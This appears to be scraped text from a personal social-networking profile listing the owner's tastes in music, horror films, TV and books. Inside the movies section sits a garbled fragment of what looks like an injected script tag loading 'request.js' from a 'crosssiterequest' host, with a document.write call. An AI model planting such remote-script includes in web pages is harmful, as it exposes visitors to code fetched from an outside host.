Photography, Art in General, Music, Thinking, Watching Thunderstorms, Sitting infront of fire and drinkin milo with marshmellows :P , Scary movies, Dark surrealist art, Sleeping, watching cartoons, eating popcorn and Reading criminology books, Pvc and Body modifications. Mocking Teenyboppers. Live Music and Late Nights MyGen Profile Generator
People and space aliens and geeks and freaks and pyschos and guys who can burp the alphabet (thats a turn on hehehe) , the performance artist Stellarc, vivian from the young ones and the guy from the hell raiser movies and would also like to meet the chucky doll :):):) lol nah just really interesting people.... people that have a brain people who can think for themselfs.People who like people for who they are always rock in my books..i reguard my friends very highly and family is also important to me i spose right now im just lookin people to chat with not looking for fuck buddies or hook ups. My someone special has arrived so i dont need random hook ups im just looking for good mates
Rob Zombie, The Sisters Of Mercy, TAKE DOWN LUCY (seriously see this band live )Pluto,Whitestripes,Straitjacket Fits,Fur Patrol,Tadpole,Elemeno P,Jack Off Jill,Garbage,70's/80's Punk Bands(u.k),Sublime,Goldfrapp,INXS, Weezer,pixies,bloodhound gang,Yeah Yeah Yeahs, Guns 'n'roses,Audioslave,Nirvana,Offspring,foamy ed, Deja voodoo,Hole,Courtney love,Candyskins,Something Corporate,Hlah, Spacehog, Elastica, Smashing Pumpkins, The Candyskins, Red Hot Chilli Peppers, Spooky Tooth, Zebrahead, Stellar, Strawpeople, The Flamejobs, Placebo, The Cramps, The Sexgang Children (uk), Alichas attic, Blondie, ,Marilyn Manson, Nikka Coasta, REM, Soft Cell, Spin Doctors, Jimi Hendrix, Eric Clapton, Kiss, Dire Straits, Veruca Salt, Die Die Die, Friggs, The Scorpians, Motley Crue.....And tonnes more MyGen Profile Generator
OLD SCARY HORROR MOVIES are by far my fave but also into comiedies basically anything that makes me scared or laugh my head off............. Idle hands,Shawshank redemption,Green mile,Queen of the damned,Frankinstein,Nightmare before christmas,Ghostbuters 1 & 2,Blues brothers,White noise,The ninth gate,Hellraiser, The Howling (1981), Night Of the living Dead, Day Of The Triffids, War Of The Worlds, Fallen, Monty Python, Conformation Of Aliens Among us, The Haunting (circa 1963), Ive Been Waiting For You, Nosferatu, Salems lot, The Body Snatchers, The Village Of The Dammed, Tommyknockers,Back to the Future 1,2,3, Dog Soliders, Mars Attacks, Carrie, Carry On Screaming, Cone Heads, Austin powers 1,2,3 , Stir Of Echos, What Lies Beneath, Shaft, Hallowman, Fight Club, Seven, Teenagers From Outerspace (circa 1958-9)... And tonnes more MyGen Profile Generator .... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("nathanjosiah1...{}");}..
Ncis,Csi,C4,Happy tree friends,The Young Ones,The Simpsons, Family Guy, Spongebob and re runs of anything also those infomercials that sell you random crap..... (but thats not all be one of the first 20 callers and recive a set of stake knifes worth $199.95...) i always wanted to be one of the infomerical sellers lol MyGen Profile Generator
Currently reading Origins Of The Mind....mind-brain connections (the basis of conscious experiance thinking, speaking, seeing, waking sleep, remembering and more) by Charles Furst..... if u ever get a chance it is soo worth reading :) Into the darklands(criminal psychology)By Nigel Latta,The di vinci code By Dan Brown,Frankinstein By Mary Shelly, Ann Rice and poppy z brite, 1984 is a fuckin good book too ,U.F.O and ghost books and of course the dictionary and colouring books lol i can colour inbetween the lines lol MyGen Profile Generator
Ben is my hero he knows what he has done for me and im forever greatful that we have found eachother....Batman, he man, teachers,nurses,police people as they never get enough credit for what they do....:P MyGen Profile Generator ..